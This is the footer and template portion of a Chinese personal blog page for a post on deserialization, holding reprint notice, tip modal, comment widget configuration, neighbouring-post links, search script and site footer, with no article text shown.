                    <a href="https://Ethe448.github.io/2021/06/30/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">https://Ethe448.github.io/2021/06/30/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Ethe</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/web%E5%AD%A6%E4%B9%A0/">
                                    <span class="chip bg-color">web学习</span>
                                </a>
                            
                                <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">
                                    <span class="chip bg-color">反序列化</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("https://epicture.oss-cn-beijing.aliyuncs.com/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="/libs/valine/av-min.js"></script>
<script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/valine/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: '9uxoX9BlIsmwlt8gNkGLF9Ow-gzGzoHsz',
        appKey: 'rrsgRW80sgJP9PdFwFycskT9',
        notify: 'false' === 'true',
        verify: 'false' === 'true',
        visitor: 'true' === 'true',
        avatar: 'mm',
        pageSize: '8',
        lang: 'zh-cn',
        placeholder: 'just go go'
    });
</script>

<!--酷Q推送-->


    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2021/08/31/%E6%80%BB%E7%BB%93/">
                    <div class="card-image">
                        
                        
                        <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/featureimages/2.jpg" class="responsive-img" alt="总结">
                        
                        <span class="card-title">总结</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            随便写点东西，写的挺乱的
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2021-08-31
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Ethe
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E9%9A%8F%E7%AC%94/">
                        <span class="chip bg-color">随笔</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2021/06/25/ssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/">
                    <div class="card-image">
                        
                        
                        <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/featureimages/11.jpg" class="responsive-img" alt="ssti模板注入">
                        
                        <span class="card-title">ssti模板注入</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                             不会python看的我好懵，一些类、对象和魔术变量的部分都不是太懂。。。。
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2021-06-25
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Ethe
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web%E5%AD%A6%E4%B9%A0/">
                        <span class="chip bg-color">web学习</span>
                    </a>
                    
                    <a href="/tags/ssti%E6%B3%A8%E5%85%A5/">
                        <span class="chip bg-color">ssti注入</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/tocbot/tocbot.min.js"></script>
<script>
$(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h1, h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h1, h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/aplayer/APlayer.min.js"></script>
<script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2023</span>
            
            <a href="/about" target="_blank">Ethe</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
                &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                        class="white-color">188.3k</span>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/Ethe448" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:1078240421@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1078240421" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 1078240421" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>

    <!-- 白天和黑夜主题 -->
<div class="sum-moon-box">
  <a class="btn-floating btn-large waves-effect waves-light" onclick="switchNightMode()" title="切换主题" >
    <i id="sum-moon-icon" class="fas fa-sun" style="width:48px; height:48px; font-size: 28px;"></i>
  </a>
</div>

<script>
  function switchNightMode() {
    $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
      setTimeout(function () {
        $('body').hasClass('DarkMode') 
        ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
        : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
          
        setTimeout(function () {
          $('.Cuteen_DarkSky').fadeOut(1e3, function () {
            $(this).remove()
          })
        }, 2e3)
      })
  }
</script>

    <script>
    //模式判断 
    if (localStorage.getItem('isDark') === '0') {
        document.body.classList.add('DarkMode');
        $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')
    } else {
        document.body.classList.remove('DarkMode');
        $('#sum-moon-icon').removeleClass("fa-sun").addClass('fa-moon')
    }
    </script>

    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/materialize/materialize.min.js"></script>
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/aos/aos.js"></script>
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/js/matery.js"></script>

    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

    
    
    <script async src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
